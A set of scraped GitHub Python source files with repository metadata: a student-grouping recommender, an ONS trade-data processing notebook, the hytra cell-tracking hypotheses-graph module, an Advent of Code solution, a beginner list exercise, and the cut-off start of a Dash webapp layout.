'Interest 2': i_weight, \n 'StudyHabits': 11, 'Hometown': 3, 'CampusLocation': 10, 'Race': 0, 'Pref': 0}\nif pair_groups:\n for n in range(0, num):\n weights.update({ 'Course '+str((n*len(i_classes))+i): c_weight for i in range(1, len(i_classes)+1) })\nelse:\n weights.update({ 'Course '+str((len(i_classes))+i): c_weight for i in range(1, len(i_classes)+1) })\n\n# construct similarity matrix for group according to features and return pairings\ndef func_pairs(features, group, num, rand_num, do_random, i_classes, model_num):\n # apply clean_df function to features\n m1 = group.copy()\n m1 = ci.clean_df(m1, features, primary, replace_space)\n \n if use_model: # how to make this work for second round?\n cosine_sim = ms.construct_similarity(m1, model_num, combine)\n else:\n # BEGINNING ------------------------------------------------------------\n m1 = m1.assign(score = [''] * len(m1))\n for feature in features:\n if feature in weights:\n for i in range(weights[feature]):\n m1['score'] = m1['score'] + \" \" + m1[feature]\n else:\n m1['score'] = m1['score'] + \" \" + m1[feature]\n \n #Construct the required TF-IDF matrix by fitting and transforming the data\n tfidf_matrix = tfidf.fit_transform(m1['score'])\n\n # Compute the cosine similarity matrix\n cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n # END -----------------------------------------------------------------\n \n #Construct a reverse map of indices and employee names\n indices = pd.Series(group.index, index=group['index']).drop_duplicates()\n\n return get_pairs(group['index'].sample(frac=1), indices, cosine_sim, group, num, rand_num, do_random)\n\n# minimize number of global variables\ndef convert_csv_to_matrix(csv, num):\n # Load data from csv\n metadata = pd.read_csv(csv)\n\n final = metadata[features + ['Email','Phone']]\n final = final.reset_index()\n\n m0 = metadata[features]\n for feature in replace_list:\n m0[feature] = m0[feature].apply(ci.key_replace)\n\n m0 = m0.reset_index()\n matches = []\n ones = []\n\n if groupby is not None:\n courses = m0[groupby].unique() # list of all unique department names\n \n for course in courses:\n group = (m0[m0[groupby] == course]).reset_index().drop('level_0', axis=1)\n \n # keep track of groups with only one member\n if len(group) == 1:\n ones.append(group)\n else:\n if speed_model:\n matches += sums.speed_up_pairings(features, group, num, rand_num, do_random, i_classes, 1, combine)\n else:\n matches += func_pairs(features, group, num, rand_num, do_random, i_classes, 1)\n \n if len(ones) != 0:\n if len(ones) == 1:\n for match in matches:\n if len(ones) == 0: break\n else:\n while len(match) < num:\n if len(ones) != 0:\n match.append(int(ones.pop(0)['index']))\n else: break\n if len(ones) > 0:\n matches[0].append(int(ones.pop(0)['index']))\n else:\n df = pd.DataFrame(columns=features + ['index'])\n \n for one in ones:\n df = df.append(one, sort=False)\n df = df.reset_index().drop('level_0', axis=1)\n if speed_model:\n matches += sums.speed_up_pairings(features, df, num, rand_num, do_random, i_classes, 1, combine)\n else:\n matches += func_pairs(features, df, num, rand_num, do_random, i_classes, 1)\n else:\n if speed_model:\n matches += sums.speed_up_pairings(features, m0, num, rand_num, do_random, i_classes, 1, combine)\n else:\n matches = func_pairs(features, m0, num, rand_num, do_random, i_classes, 1)\n # print(matches)\n if pair_groups:\n # prepare first round pairings for second round pairingsd\n pair_features = ['Name'] + i_classes\n df = pd.DataFrame(columns=pair_features)\n for pair in matches:\n lists = [[]] * len(i_classes)\n str_pair = [ str(x) for x in pair ]\n total_name = \", \".join(str_pair)\n\n data = [total_name]\n for i in pair:\n for feature in i_classes:\n add = m0[feature][m0['index'] == i].iloc[0]\n if add == add:\n lists[i_classes.index(feature)].append(m0[feature][m0['index'] == i].iloc[0])\n # print(lists)\n for i in lists:\n # print(i)\n data.append(\", \".join(i))\n pair_df = pd.DataFrame([data], columns=pair_features)\n df = pd.concat([df, pair_df], sort=False)\n df = df.reset_index().drop('index', axis=1).reset_index()\n two_classes = i_classes\n\n # complete second round pairings\n combine['Classes 2'] = two_classes\n if speed_model:\n result = sums.speed_up_pairings(pair_features, df, num2, rand_num2, do_random2, two_classes, 2, combine)\n else:\n result = func_pairs(pair_features, df, num2, rand_num2, do_random2, two_classes, 2)\n\n print_out = []\n for four in result:\n str_four = [ df[primary][df['index'] == x].iloc[0] for x in four ]\n print_out.append(\", \".join(str_four))\n else:\n print_out = [ \", \".join([ str(y) for y in x ]) for x in matches ] \n \n # get the data of the people represented by indices to insert into csv\n pairs = pd.DataFrame(columns=features + ['Email','Phone','index'])\n for group in print_out:\n index_list = group.split(\", \")\n for i in index_list:\n pairs = pairs.append(final[final['index'] == int(float(i))].iloc[0])\n data = [['-'] * (len(features)+3)]\n data2 = [['+'] * (len(features)+3)]\n\n # for spacing\n extra = pd.DataFrame(data, columns=features + ['Email','Phone','index'])\n extra2 = pd.DataFrame(data2, columns=features + ['Email','Phone','index'])\n pairs = pd.concat([pairs, extra, extra2], sort=False)\n\n # print this, output\n return pairs \n\n# Function that takes in movie title as input and outputs most similar movies\ndef get_recommendations(name, indices, cosine_sim, list_to_remove, m0, rand_num, do_random):\n # Get the index of the employee that matches the name\n idx = indices[name]\n\n # Get the pairwsie similarity scores of all employees with that employee\n sim_scores = list(enumerate(cosine_sim[idx]))\n \n # Sort the employees based on the similarity scores\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\n # Get the employee indices\n emp_indices = []\n emp_sims = []\n if do_random:\n group_num = rand_num \n else:\n group_num = num + 1\n for i in sim_scores:\n if (len(emp_indices) == group_num): break\n if i[0] not in list_to_remove and i[0] != idx:\n emp_indices.append(i[0])\n emp_sims.append(i[1])\n\n # Return the top group_num most similar people not already paired\n result = m0.iloc[emp_indices]\n result = result.assign(Similarity = emp_sims) # still need this?\n return result \n\nimport random \n# choose partners from list of top similar people from get_recommendations\ndef get_random(mylist, num, do_random): # num = number of people per group\n if (len(mylist) > num):\n inds = list(mylist.index)\n result = pd.DataFrame(columns=features)\n if do_random:\n rand_inds = random.sample(inds, num-1)\n for i in rand_inds:\n result = pd.concat([result, mylist[mylist.index == i]], sort=False)\n else:\n for i in range(0, num-1):\n result = pd.concat([result, mylist[mylist.index == inds[i]]], sort=False)\n else:\n result = mylist\n return result\n\n# loop through list of people and pair people not already paired\ndef get_pairs(emplist, indices, cosine_sim, m0, num, rand_num, do_random):\n pairs = []\n list_to_remove = []\n \n for e in emplist:\n if indices[e] not in list_to_remove:\n partner = list(get_random(get_recommendations(e, indices, cosine_sim, list_to_remove, m0, rand_num, do_random), num, do_random)['index'])\n name0 = e\n pair = [name0]\n \n list_to_remove.append(indices[e])\n for p in partner:\n pair.append(p)\n list_to_remove.append(indices[p])\n\n pairs.append(pair)\n \n list_to_remove.sort(reverse=True)\n return pairs\n\ndf = convert_csv_to_matrix(csv, num)\nprint(df)\n# print(\"Done\")\ndf.to_csv('testing.csv', index=False)","repo_name":"ALai2/AWS-Flask-ML-App","sub_path":"recommender/match_2_into_4.py","file_name":"match_2_into_4.py","file_ext":"py","file_size_in_byte":10865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38550474976","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nimport json\nfrom gssutils import *\n\nfrom zipfile import ZipFile\nfrom io import BytesIO\n\n\n# In[3]:\n\n\ndef left(s, amount):\n return s[:amount]\n\ndef right(s, amount):\n return s[-amount:]\n\n\n# In[4]:\n\n\npd.options.mode.chained_assignment = None\n\ninfo = json.load(open('info.json'))\n\nlandingPage = info['landingPage']\nlandingPage\n\nscraper1 = Scraper(landingPage[0])\nscraper1.dataset.family = info['families']\nscraper1\n\nscraper2 = Scraper(landingPage[1])\nscraper2\n\ndistribution1 = scraper1.distribution(mediaType=lambda x: 'zip' in x, latest=True)\ndistribution1\n\ndistribution2 = scraper2.distribution(mediaType=lambda x: 'zip' in x, latest=True)\ndistribution2\n\ndescr = \"\"\"\nMonthly import country-by-commodity data on the UK's trade in goods, including trade by all countries and selected commodities, non-seasonally adjusted.\n\nUsers should note the following:\nIndustry data has been produced using Standard Industrial Classification 2007 (SIC07).\nCommodity data has been produced using Standard International Trade Classification (SITC).\n\nDue to risks around disclosing data related to individual firms we are only able to provide data for certain combinations of the dimensions included, i.e. country, commodity and industry. This dataset therefore provides the following two combinations:\n Industry (SIC07 2 digit), by Commodity (SITC 2 digit), by geographic region (worldwide, EU and non-EU)\n Industry (SIC07 2 digit), by Commodity total, by individual country\n\nMethodology improvements\nWithin this latest experimental release improvements have been made to the methodology that has resulted in some revisions when compared to our previous release in April 2019.\nThese changes include; improvements to the data linking methodology and a targeted allocation of some of the Balance of Payments (BoP) adjustments to industry.\nThe data linking improvements were required due to subtleties in both the HMRC data and IDBR not previously recognised within Trade.\n\nWhile we are happy with the quality of the data in this experimental release we have noticed some data movements, specifically in 2018.\nWe will continue to review the movements seen in both the HMRC microdata and the linking methodology and, where appropriate, will further develop the methodology for Trade in Goods by Industry for future releases.\n\n\"\"\"\n\ntitle = \"Trade in goods: country-by-commodity, exports and imports\"\nscraper1.dataset.title = 'UK trade in goods: country-by-commodity, exports and imports'\nscraper2.dataset.title = 'UK trade in goods: country-by-commodity, exports and imports'\nscraper1.dataset.description = descr\nscraper2.dataset.description = descr\n\n\ndef yearSum(dataframe):\n '''\n sums up the observations for each respective year from Jan to Dec\n and returns the dataframe with summed year-observation columns\n '''\n df = dataframe\n new_data = []\n new_data.append(df.iloc[:,0:3])\n\n startYear = int(list(df.columns)[3][:4])\n endYear = int(list(df.columns)[-1][:4])\n\n for year in range(startYear,endYear+1):\n year = str(year)\n df1 = df.loc[:, year +'JAN' : year +'DEC']\n df1[year] = df1.sum(axis=1)\n new_data.append(df1[year])\n year_sum = pd.concat(new_data, axis=1)\n return year_sum\n\n\ndef transform(dataframe):\n '''transforms the dataframe to a datacube\n '''\n df = dataframe\n df.rename(columns={\n 'COMMODITY': 'Commodity',\n 'COUNTRY': 'ONS Partner Geography',\n 'DIRECTION': 'Flow'\n }, inplace=True)\n tidy = pd.melt(df, id_vars=['Commodity','ONS Partner Geography', 'Flow'], var_name='Period', value_name='Value')\n tidy_sheet = tidy.sort_values(['Commodity','ONS Partner Geography', 'Flow'])\n #tidy_sheet = tidy_sheet[tidy_sheet['Value'] != 0]\n return tidy_sheet\n\n\n# In[5]:\n\n\ntab_names = ['1. Annual Exports', '2. Quarterly Exports', '3. Monthly Exports']\ntidy_tabs = []\n\n'''Country by Commodity Export data'''\nwith ZipFile(BytesIO(scraper1.session.get(distribution1.downloadURL).content)) as zip:\n assert(len(zip.namelist()) == 1)\n with zip.open(zip.namelist()[0]) as excelFile:\n buffered_fobj = BytesIO(excelFile.read())\n for i in tab_names:\n data1 = pd.read_excel(buffered_fobj,\n sheet_name=i, skiprows=3, dtype={\n 'COMMODITY': 'category',\n 'COUNTRY': 'category',\n 'DIRECTION': 'category'\n }, na_values=['','N/A'], keep_default_na=False)\n tidy_tabs.append(data1)\n\nexport_sheets = []\n\nfor i in tidy_tabs:\n export_sheets.append(transform(i))\n\ntable1 = pd.concat(export_sheets)\ntable1\n\n\n# In[6]:\n\n\ntab_names = ['1. Annual Imports', '2. Quarterly Imports', '3. Monthly Imports']\ntidy_tabs = []\n\n'''Country by Commodity Import data'''\nwith ZipFile(BytesIO(scraper2.session.get(distribution2.downloadURL).content)) as zip:\n assert(len(zip.namelist()) == 1)\n with zip.open(zip.namelist()[0]) as excelFile:\n buffered_fobj = BytesIO(excelFile.read())\n for i in tab_names:\n data2 = pd.read_excel(buffered_fobj,\n sheet_name=i, skiprows=3, dtype={\n 'COMMODITY': 'category',\n 'COUNTRY': 'category',\n 'DIRECTION': 'category'\n }, na_values=['','N/A'], keep_default_na=False)\n tidy_tabs.append(data2)\n\nimport_sheets = []\n\nfor i in tidy_tabs:\n import_sheets.append(transform(i))\n\ntable2 = pd.concat(import_sheets)\ntable2\n\n\n# In[7]:\n\n\n# =================================================================================================\n# =================================================================================================\n# =================================================================================================\n# Get rid of some years as PMD4 is having trouble publishing without timing out\ntable = pd.concat([table1, table2])\n#print(table['Commodity'].count())\n\n\"\"\"for y in range(1995, 2018):\n table = table[~table['Period'].str.contains(str(y))]\n #print(str(y) + ': ' + str(table['Commodity'].count()))\"\"\"\n\ntable['Period'].unique()\n# =================================================================================================\n# =================================================================================================\n# =================================================================================================\n\n\n# In[8]:\n\n\npd.set_option('display.float_format', lambda x: '%.0f' % x)\n\ntable.loc[table['Period'].str.len() == 7, 'Period'] = pd.to_datetime(table.loc[table['Period'].str.len() == 7, 'Period'], format='%Y%b').astype(str).map(lambda x: 'month/' + left(x,7))\n#table['Period'] = table['Period'].astype(str)\ntable.dropna(subset=['Value'], inplace=True)\n#table['Value'] = table['Value'].astype(int)\n\ntable['Commodity'].cat.categories = table['Commodity'].cat.categories.map(lambda x: x.split(' ')[0])\ntable['ONS Partner Geography'].cat.categories = table['ONS Partner Geography'].cat.categories.map(lambda x: x[:2])\ntable['Flow'] = table['Flow'].map(lambda x: x.split(' ')[1])\n\n\n# In[9]:\n\n\ntable['Seasonal Adjustment'] = pd.Series('NSA', index=table.index, dtype='category')\n#table['Measure Type'] = pd.Series('gbp-million', index=table.index, dtype='category')\n#table['Unit'] = pd.Series('gbp-million', index=table.index, dtype='category')\n\ntable = table[['ONS Partner Geography','Period','Flow','Commodity','Seasonal Adjustment','Value']]\ntable['Flow'] = table['Flow'].map(lambda x: pathify(x))\n\ntable\n\n\n# In[10]:\n\n\nimport numpy as np\n\nclass MyDict(dict):\n def __missing__(self, key):\n return key\n\ndf = table.reset_index(drop=True)\n\ndf['Marker'] = ''\ndf['Marker'] = np.where(df['Value'].str.isnumeric() == False, df['Value'], df['Marker'])\n\nmarkerRep = MyDict({'X' : 'data-not-collated'})\nvalRep = MyDict({'X' : ''})\n\ndf['Marker'] = df['Marker'].map(markerRep)\ndf['Value'] = df['Value'].map(valRep)\n\ndf\n\n\n# In[11]:\n\n\ndfMonth = df[df['Period'].str.contains(\"month\")]\ndfQuarter = df[df['Period'].str.contains(\"Q\")]\ndfQuarter['Period'] = dfQuarter['Period'].map(lambda x: 'quarter/' + left(x, 4) + '-' + right(x, 2))\ndfYear = df[~df['Period'].str.contains(\"month|Q\")]\ndfYear['Period'] = dfYear['Period'].map(lambda x: 'year/' + x)\n\ndf = pd.concat([dfYear, dfQuarter, dfMonth]).reset_index(drop=True)\n\ndf['Commodity'] = df['Commodity'].astype(str)\n\ndf\n\n\n# In[12]:\n\n\ndf.dtypes\n\n\n# In[13]:\n\n\ninfo_json_dataset_id = info.get('id', Path.cwd().name)\ninfo_json_dataset_id\n\n\n# In[14]:\n\n\n\"\"\"years = table['Period'].map(lambda p: p[-7:-3])\nfor period in years.unique():\n\n if len(cubes.cubes) == 0:\n graph_uri = f\"http://gss-data.org.uk/graph/gss_data/trade/ons-trade-in-goods\"\n csv_name = 'ons-trade-in-goods'\n cubes.add_cube(scraper1, table[years == period], csv_name, graph=info_json_dataset_id)\n else:\n graph_uri = f\"http://gss-data.org.uk/graph/gss_data/trade/ons-trade-in-goods/{period}\"\n csv_name = f\"ons-trade-in-goods-{period}\"\n cubes.add_cube(scraper1, table[years == period], csv_name, graph=info_json_dataset_id, override_containing_graph=graph_uri, suppress_catalog_and_dsd_output=True)\n\ngraph_uri\"\"\"\n\n\n# In[19]:\n\n\ndf = df[ df['Commodity'].isin(['4','04'])]\n\ndf = df.head(10000).reset_index(drop=True)\n\ndf\n\n\n# In[16]:\n\n\ndf.to_csv('observations.csv', index=False)\n\ncatalog_metadata = scraper1.as_csvqb_catalog_metadata()\ncatalog_metadata.to_json_file('catalog-metadata.json')\n\n\n# In[17]:\n\n\nfrom IPython.core.display import HTML\nfor col in df:\n if col not in ['Value']:\n df[col] = df[col].astype('category')\n display(HTML(f\"<h2>{col}</h2>\"))\n display(df[col].cat.categories)\n\n","repo_name":"GSS-Cogs/family-trade","sub_path":"datasets/ONS-Trade-in-goods/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11252529766","text":"from __future__ import print_function, absolute_import, nested_scopes, generators, division, with_statement, unicode_literals\nimport logging\nimport numpy as np\nfrom hytra.core.hypothesesgraph import HypothesesGraph, getTraxelFeatureVector, negLog, listify\nimport hytra.core.jsongraph\nfrom hytra.util.progressbar import ProgressBar, DefaultProgressVisitor\n\ndef getLogger():\n ''' logger to be used in this module '''\n return logging.getLogger(__name__)\n\nclass IlastikHypothesesGraph(HypothesesGraph):\n '''\n Hypotheses graph specialized for the ConservationTracking implementation in ilastik.\n '''\n\n def __init__(self, \n probabilityGenerator,\n timeRange, \n maxNumObjects, \n numNearestNeighbors,\n fieldOfView,\n divisionThreshold=0.1,\n withDivisions=True,\n borderAwareWidth=10,\n maxNeighborDistance=200,\n transitionParameter=5.0,\n transitionClassifier=None,\n skipLinks=1,\n skipLinksBias=20,\n progressVisitor=DefaultProgressVisitor()):\n '''\n Constructor\n '''\n super(IlastikHypothesesGraph, self).__init__()\n\n # store values\n self.probabilityGenerator = probabilityGenerator\n self.timeRange = timeRange\n self.maxNumObjects = maxNumObjects\n self.numNearestNeighbors = numNearestNeighbors\n self.fieldOfView = fieldOfView\n self.divisionThreshold = divisionThreshold\n self.withDivisions = withDivisions\n self.borderAwareWidth = borderAwareWidth\n self.maxNeighborDistance = maxNeighborDistance\n self.transitionClassifier = transitionClassifier\n self.transitionParameter = transitionParameter\n self.skipLinks = skipLinks\n self.skipLinksBias = skipLinksBias\n self.progressVisitor = progressVisitor\n\n # build hypotheses graph\n self.buildFromProbabilityGenerator(probabilityGenerator,\n numNearestNeighbors=numNearestNeighbors,\n maxNeighborDist=maxNeighborDistance,\n withDivisions=withDivisions,\n divisionThreshold=divisionThreshold,\n skipLinks=skipLinks)\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return (self._graph,\n self.withTracklets,\n self.allowLengthOneTracks,\n self._nextNodeUuid,\n self.maxNumObjects,\n self.skipLinksBias,\n self.transitionClassifier,\n self.transitionParameter,\n self.withDivisions,\n self.fieldOfView,\n self.probabilityGenerator,\n self.timeRange,\n self.numNearestNeighbors,\n self.divisionThreshold,\n self.borderAwareWidth,\n self.maxNeighborDistance,\n self.skipLinks\n )\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n\n try:\n self._graph, \\\n self.withTracklets, \\\n self.allowLengthOneTracks, \\\n self._nextNodeUuid, \\\n self.maxNumObjects, \\\n self.skipLinksBias, \\\n self.transitionClassifier, \\\n self.transitionParameter, \\\n self.withDivisions, \\\n self.fieldOfView, \\\n self.probabilityGenerator, \\\n self.timeRange, \\\n self.numNearestNeighbors, \\\n self.divisionThreshold, \\\n self.borderAwareWidth, \\\n self.maxNeighborDistance, \\\n self.skipLinks \\\n = state\n except:\n pass\n\n self.progressVisitor=DefaultProgressVisitor()\n\n def insertEnergies(self):\n \"\"\"\n Inserts the energies (AKA features) into the graph, such that each node and link \n hold all information needed to run tracking.\n\n See the documentation of `hytra.core.hypothesesgraph` for details on how the features are stored.\n \"\"\"\n # define wrapper functions\n def detectionProbabilityFunc(traxel):\n return self.getDetectionFeatures(traxel, self.maxNumObjects + 1)\n\n def transitionProbabilityFunc(srcTraxel, destTraxel):\n if self.transitionClassifier is None:\n return self.getTransitionFeaturesDist(srcTraxel, destTraxel, self.transitionParameter, self.maxNumObjects + 1)\n else:\n return self.getTransitionFeaturesRF(srcTraxel, destTraxel, self.transitionClassifier, self.probabilityGenerator, self.maxNumObjects + 1)\n\n def boundaryCostMultiplierFunc(traxel, forAppearance):\n return self.getBoundaryCostMultiplier(traxel, self.fieldOfView, self.borderAwareWidth, self.timeRange[0], self.timeRange[-1], forAppearance)\n\n def divisionProbabilityFunc(traxel):\n if self.withDivisions:\n try:\n divisionFeatures = self.getDivisionFeatures(traxel)\n if divisionFeatures[0] > self.divisionThreshold:\n divisionFeatures = list(reversed(divisionFeatures))\n else:\n divisionFeatures = None\n except:\n divisionFeatures = None\n return divisionFeatures\n else:\n return None\n\n super(IlastikHypothesesGraph, self).insertEnergies(\n self.maxNumObjects,\n detectionProbabilityFunc,\n transitionProbabilityFunc,\n boundaryCostMultiplierFunc,\n divisionProbabilityFunc,\n self.skipLinksBias)\n\n def getDetectionFeatures(self, traxel, max_state):\n \"\"\"\n USe the detection probabilities stored as `detProb` in the features of the traxel\n \"\"\"\n return getTraxelFeatureVector(traxel, \"detProb\", max_state)\n\n\n def getDivisionFeatures(self, traxel):\n \"\"\"\n Use the division probability stored in the features of the given traxel.\n \"\"\"\n prob = traxel.get_feature_value(\"divProb\", 0)\n return [1.0 - prob, prob]\n\n\n def getTransitionFeaturesDist(self, traxelA, traxelB, transitionParam, max_state):\n \"\"\"\n Get the transition probabilities based on the object's distance\n \"\"\"\n positions = [np.array([t.X(), t.Y(), t.Z()]) for t in [traxelA, traxelB]]\n dist = np.linalg.norm(positions[0] - positions[1])\n prob = np.exp(-dist / transitionParam)\n\n return [1.0 - prob] + [prob] * (max_state - 1)\n\n\n def getTransitionFeaturesRF(self, traxelA, traxelB, transitionClassifier, probabilityGenerator, max_state):\n \"\"\"\n Get the transition probabilities by predicting them with the classifier\n \"\"\"\n feats = [probabilityGenerator.getTraxelFeatureDict(obj.Timestep, obj.Id) for obj in [traxelA, traxelB]]\n featVec = probabilityGenerator.getTransitionFeatureVector(feats[0], feats[1], transitionClassifier.selectedFeatures)\n probs = transitionClassifier.predictProbabilities(featVec)[0]\n\n # or image borders, so predict probability just by distance\n upperBound = self.fieldOfView.getUpperBound()\n lowerBound = self.fieldOfView.getLowerBound()\n\n coordsMax = feats[0]['Coord<Maximum >']\n boundMax = np.array(upperBound[1:len(coordsMax)+1])\n coordsMin = feats[0]['Coord<Minimum >']\n boundMin = np.array(lowerBound[1:len(coordsMin)+1])\n\n dist_border = self.fieldOfView.spatial_distance_to_border(traxelA.Timestep, traxelA.X(), traxelA.Y(), traxelA.Z(), False)\n\n # find the objects crossing the image border and return the distance based probability instead\n # REASON: The TC classifier gets confused by the feature values at the image border.\n # experiments on Fluo-N2DH-SIM 01:\n # TC no border treatment: TRA measure 0.9888\n # TC with border treatment: 0.991302\n # pure distance: 0.993\n # from all links: used distance 340 times, TC prob 3088 times used\n\n\n # experiments on Rapoport:\n # TC no border treatment: TRA measure 0.952467\n # TC with border treatment: 0.95267\n # pure distance: 0.951674\n # from all links: used distance 13598 times, TC prob 271502 times\n\n if np.isclose(coordsMax, boundMax).any() or np.isclose(coordsMin, boundMin).any():\n return self.getTransitionFeaturesDist(traxelA, traxelB, self.transitionParameter, self.maxNumObjects + 1)\n else:\n return [probs[0]] + [probs[1]] * (max_state - 1)\n\n\n\n def getBoundaryCostMultiplier(self, traxel, fov, margin, t0, t1, forAppearance):\n \"\"\"\n A traxel's appearance and disappearance probability decrease linearly within a `margin` to the image border\n which is defined by the field of view `fov`. \n Traxels in the first frame appear for free, and traxels in the last frame disappear for free.\n \"\"\"\n if (traxel.Timestep <= t0 and forAppearance) or (traxel.Timestep >= t1 - 1 and not forAppearance):\n return 0.0\n\n dist = fov.spatial_distance_to_border(traxel.Timestep, traxel.X(), traxel.Y(), traxel.Z(), False)\n if dist > margin:\n return 1.0\n else:\n if margin > 0:\n return float(dist) / margin\n else:\n return 1.0\n\n\ndef convertLegacyHypothesesGraphToJsonGraph(hypothesesGraph,\n nodeIterator,\n arcIterator,\n withTracklets,\n maxNumObjects,\n numElements,\n traxelMap,\n detectionProbabilityFunc,\n transitionProbabilityFunc,\n boundaryCostMultiplierFunc,\n divisionProbabilityFunc):\n '''\n Build a json representation of this hypotheses graph, by transforming the probabilities for certain\n events (given by the `*ProbabilityFunc`-functions per traxel) into energies. If the given graph\n contained tracklets (`withTracklets`), then also the probabilities over all contained traxels will be\n accumulated for those nodes in the graph.\n\n The `hypothesesGraph` as well as `nodeIterator` and `arcIterator` are needed as parameters to\n support the legacy pgmlink-style hypotheses graph as well.\n\n ** Parameters: **\n\n * `hypothesesGraph`: graph whose nodes and edges we are about to traverse.\n * `nodeIterator`: node iterator\n * `arcIterator`: arc iterator\n * `withTracklets`: whether tracklets are used\n * `maxNumObjects`: the max number of objects per detections\n * `numElements`: number of nodes + number of edges (for progress bar)\n * `traxelMap`: mapping from graph-node to list of traxels (in a tracklet)\n * `detectionProbabilityFunc`: should take a traxel and return its detection probabilities\n ([prob0objects, prob1object,...])\n * `transitionProbabilityFunc`: should take two traxels and return this link's probabilities\n ([prob0objectsInTransition, prob1objectsInTransition,...])\n * `boundaryCostMultiplierFunc`: should take a traxel and a boolean that is true if we are seeking for an appearance cost multiplier, \n false for disappearance, and return a scalar multiplier between 0 and 1 for the\n appearance/disappearance cost that depends on the traxel's distance to the spacial and time boundary\n * `divisionProbabilityFunc`: should take a traxel and return its division probabilities\n ([probNoDiv, probDiv])\n '''\n\n getLogger().info(\"Creating JSON graph from legacy hypotheses graph\")\n progressBar = ProgressBar(stop=numElements)\n trackingGraph = hytra.core.jsongraph.JsonTrackingGraph()\n\n # add all detections to JSON\n for n in nodeIterator:\n if not withTracklets:\n # only one traxel, but make it a list so everything below works the same\n traxels = [traxelMap[n]]\n else:\n traxels = traxelMap[n]\n\n # accumulate features over all contained traxels\n previousTraxel = None\n detectionFeatures = np.zeros(maxNumObjects + 1)\n for t in traxels:\n detectionFeatures += np.array(negLog(detectionProbabilityFunc(t)))\n if previousTraxel is not None:\n detectionFeatures += np.array(negLog(transitionProbabilityFunc(previousTraxel, t)))\n previousTraxel = t\n\n detectionFeatures = listify(list(detectionFeatures))\n\n # division only if probability is big enough\n divisionFeatures = divisionProbabilityFunc(traxels[-1])\n if divisionFeatures is not None:\n divisionFeatures = listify(negLog(divisionFeatures))\n\n # appearance/disappearance\n appearanceFeatures = listify([0.0] + [boundaryCostMultiplierFunc(traxels[0], True)] * maxNumObjects)\n disappearanceFeatures = listify([0.0] + [boundaryCostMultiplierFunc(traxels[-1], False)] * maxNumObjects)\n\n trackingGraph.addDetectionHypothesesFromTracklet(traxels,\n detectionFeatures,\n divisionFeatures,\n appearanceFeatures,\n disappearanceFeatures,\n timestep=[traxels[0].Timestep, traxels[-1].Timestep])\n progressBar.show()\n\n # add all links\n for a in arcIterator:\n if not withTracklets:\n srcTraxel = traxelMap[hypothesesGraph.source(a)]\n destTraxel = traxelMap[hypothesesGraph.target(a)]\n else:\n srcTraxel = traxelMap[hypothesesGraph.source(a)][-1] # src is last of the traxels in source tracklet\n destTraxel = traxelMap[hypothesesGraph.target(a)][0] # dest is first of traxels in destination tracklet\n src = trackingGraph.traxelIdPerTimestepToUniqueIdMap[str(srcTraxel.Timestep)][str(srcTraxel.Id)]\n dest = trackingGraph.traxelIdPerTimestepToUniqueIdMap[str(destTraxel.Timestep)][str(destTraxel.Id)]\n\n features = listify(negLog(transitionProbabilityFunc(srcTraxel, destTraxel)))\n trackingGraph.addLinkingHypotheses(src, dest, features)\n progressBar.show()\n\n return trackingGraph","repo_name":"chaubold/hytra","sub_path":"hytra/core/ilastikhypothesesgraph.py","file_name":"ilastikhypothesesgraph.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74504265155","text":"# Part 1\nfile = open(\"input.txt\")\nl = file.readlines()\n\nsum = 0\nfor line in l:\n sum += int(line)\n\nprint(\"Part 1: \" + str(sum))\n\n# Part 2\ncurrFreq = 0\ns = {0}\ni = 0\n\nwhile True:\n if i >= len(l):\n i = 0\n\n currFreq += int(l[i])\n\n if {currFreq}.issubset(s):\n print(\"Part 2: \" + str(currFreq))\n break\n s.add(currFreq)\n\n i += 1","repo_name":"laxel/adventOfCode","sub_path":"2018/Day01/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3385883070","text":"# Title: Module_01 Exercise_08\n# Author: Wendy Dushanin\n# UNCC Student ID: 800727084\n# Date: January 18, 2022\n\n# Description: Take in 10 integers from user. Create a new list with only elements\n# which appear once. Print the list with the unique elements.\n\n# References: \n# https://thispointer.com/python-3-ways-to-check-if-there-are-duplicates-in-a-list/\n# https://www.geeksforgeeks.org/python-ways-to-remove-duplicates-from-list/\n# https://www.geeksforgeeks.org/counting-the-frequencies-in-a-list-using-dictionary-in-python/\n# https://www.kite.com/python/answers/how-to-count-item-frequency-in-python\n\n# creates list to store inputs\n\nlist_01 = []\nfreq = {}\nlist_02 = []\n\n#Asks users for the elements of list_01\nfor i in range(0, 10):\n # Asks user for individual list_01 inputs\n num = int(input(f'Enter number for list_01: '))\n # Adds inputs to the list_01\n list_01.append(num)\n\nfor elem in list_01:\n if elem in freq:\n freq[elem] += 1\n else:\n freq[elem] = 1\n\nif freq == 1:\n list_02.append(freq)\n\nprint(list_02)\n","repo_name":"wDushanin/ITSC-3155-Intro-to-Python-Exercises","sub_path":"exercise_08.py","file_name":"exercise_08.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43444074493","text":"import os\nfrom functools import partial\n\nimport dash_bootstrap_components as dbc\nimport polars as pl\nfrom dash import dcc, html\n\nfrom .filter_rows import get_filter_rows\n\nintro = open(\"webapp/layout/intro.md\", \"r\").read()\ndata_path = os.getcwd() + \"/data\"\n\nplayers = pl.read_parquet(data_path + \"/players.parquet\")\n\nmake_tab = partial(\n dcc.Tab, style={\"fontWeight\": \"bold\"}, selected_style={\"fontWeight\": \"bold\"}\n)\n\nattribution = html.Details(\n title=\"Description\",\n open=True,\n style={\"margin-top\": \"1%\", \"margin-left\": \"1.5%\"},\n children=[\n html.Summary(id=\"open_details\", children=\"Close Description\"),\n html.Div(id=\"open_state\", children=True, style={\"display\": \"none\"}),\n 